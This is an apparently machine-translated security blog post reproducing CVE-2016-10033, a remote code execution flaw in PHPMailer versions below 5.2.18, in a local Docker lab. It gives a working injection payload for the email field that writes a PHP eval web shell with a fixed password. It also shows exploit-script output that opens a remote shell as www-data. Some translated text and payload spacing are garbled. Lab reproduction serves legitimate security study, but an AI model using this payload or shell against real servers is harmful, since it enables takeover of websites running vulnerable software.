PHPMailer remote command execution vulnerability reappears

I. Introduction of vulnerabilities

PHPMailer is a PHP email creation and delivery class for multiple open source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! And so on.

PHPMailer < 5.2.18 has a security vulnerability that allows an unauthenticated remote attacker to execute arbitrary code in the context of a Web server user to remotely control a target Web application.

Ii. Impact Version:

PHPMailer < 5.2.18

Third, vulnerability recurrence

Docker environment:

docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033
Copy the code

Pull image boot environment:

http://192.168.1.107:8080/

http://192.168.1.107:8080/, simply type in the name place such as "aaa", in the email input: -queuedirectory =/ TMP /. -x /var/www/ HTML/[email protected] <? PHP @eval($_POST['thelostworld']) ? >Copy the code

Upload a word Trojan, the page will respond 3-5 minutes, the response time is long

Trojan address: http://192.168.1.107:8080/a.php password: thelostworld

Virtual terminal:

Using scripts:

Obtaining scripts The background replies to PHPMailer to obtain scripts

➜ Desktop./ exploitor. sh 192.168.1.107:8080 [+] CVE-2016-10033 Exploits by Opsxcq [+] Exploiting 192.168.1.107:8080 [+] Target exploited, Acessing shell at http://192.168.1.107:8080/backdoor.php [+] Checking if the backdoor was created on the target system [+] Backdoor.php found on remote system [+] Running whoami www-data RemoteShell> [+] Running RemoteShell> id [+] Running id uid=33(www-data) gid=33(www-data) groups=33(www-data)Copy the code

Access Trojan address:

http://192.168.1.107:8080/backdoor.php

Reference:

www.cnblogs.com/Hi-blog/p/7…

www.exploit-db.com/exploits/40…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…